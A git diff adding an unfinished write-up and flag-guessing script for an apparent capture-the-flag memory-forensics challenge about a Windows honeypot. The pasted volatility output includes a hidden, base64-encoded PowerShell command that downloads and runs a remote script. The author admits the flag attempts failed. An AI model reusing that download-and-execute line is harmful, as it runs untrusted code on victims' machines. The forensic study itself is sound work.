diff --git a/forensics/honeypot/README.md b/forensics/honeypot/README.md new file mode 100644 index 0000000..37d59db --- /dev/null +++ b/forensics/honeypot/README.md @@ -0,0 +1,105 @@ +# Honeypot + +Santa really encourages people to be at his good list but sometimes he is a bit +naughty himself. He is using a Windows 7 honeypot to capture any suspicious +action. Since he is not a forensics expert, can you help him identify any +indications of compromise? + +1. Find the full URL used to download the malware. +2. Find the malicious's process ID. +3. Find the attackers IP + +Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum} +Download Link: http://46.101.25.140/forensics_honeypot.zip + +## Flag + +## Progress so far + +- The honeypot.zip file contains รค windows memory dump +- By using the `volatility3` framework one can extract data from the dump +- By checking `vol -f honeypot.raw windows.cmdline.CMDLine` the malicious process is quite obvious + +```bash +cat win_cmdline + +... snip ... + +3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe" +3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe +3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" +3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" +SCODEF:3324 CREDAT:14337 +2700 powershell.exe +"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e +aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA== +3732 conhost.exe \??\C:\Windows\system32\conhost.exe +"288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479 +4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?) +4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process +exited?) +2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe" +2920 conhost.exe \??\C:\Windows\system32\conhost.exe +"280284285205075330588133904-110126809119471720131011406317-845024101-1158882802 +168 dllhost.exe C:\Windows\system32\DllHost.exe +/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} +``` + +- The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url +- The PID of said command is 2700 +- By examining the currently active connections, using `vol -f honeypot.raw windows.netscan.Netscan` the following foreign IPs stand out: + +``` +Volatility 3 Framework 1.0.1 +Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner +Created + +0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - - +0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - - +0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - - +0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - - +0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - - +0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - - +0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - - +0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - - +0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - - +0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - - +0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - - +0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - - +0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - - +``` + +- By eliminating all the ips which belong to M$ we end up with a small set of 5 ips. +- To generate the flag the follwing shell script was used, sadly with no success. +- I'm unsure about the `... | md5sum` part as this adds a hyphen... + +```cat generate_flags.sh +#!/bin/bash + +list=( + 147.182.172.189 # digital ocean + #172.67.177.22 # cloudflare net + #212.205.126.106 # greece + #93.184.220.29 # edgecast + #95.100.210.141 # akamai +) + +pids=( + 1556 # explorer + 2460 # SearchFilterHo + 2856 # explorer + 3324 # iexplorer + 3344 # iexplorer +) + +for ip in ${list[@]}; do + for pid in ${pids[@]}; do + echo Generating Flag for $ip and $pid: + echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}" + echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}" + done +done +``` + + +- I don't know, maybe the challenge is borked somehow? diff --git a/forensics/honeypot/generate_flags.sh b/forensics/honeypot/generate_flags.sh index 636b329..0201871 100755 --- a/forensics/honeypot/generate_flags.sh +++ b/forensics/honeypot/generate_flags.sh @@ -1,21 +1,25 @@ #!/bin/bash list=( - 10.0.2.15 - 127.0.0.1 - 65.55.44.109 - 147.182.172.189 - 172.67.177.22 - 204.79.197.203 - 212.205.126.106 - 93.184.220.29 - 95.100.210.141 + 147.182.172.189 # digital ocean + #172.67.177.22 # cloudflare net + #212.205.126.106 # greece + #93.184.220.29 # edgecast + #95.100.210.141 # akamai ) +pids=( + 1556 # explorer + 2460 # SearchFilterHo + 2856 # explorer + 3324 # iexplorer + 3344 # iexplorer +) for ip in ${list[@]}; do - echo Generating Flag from $ip: - echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}" - echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}" + for pid in ${pids[@]}; do + echo Generating Flag for $ip and $pid: + echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}" + echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}" + done done -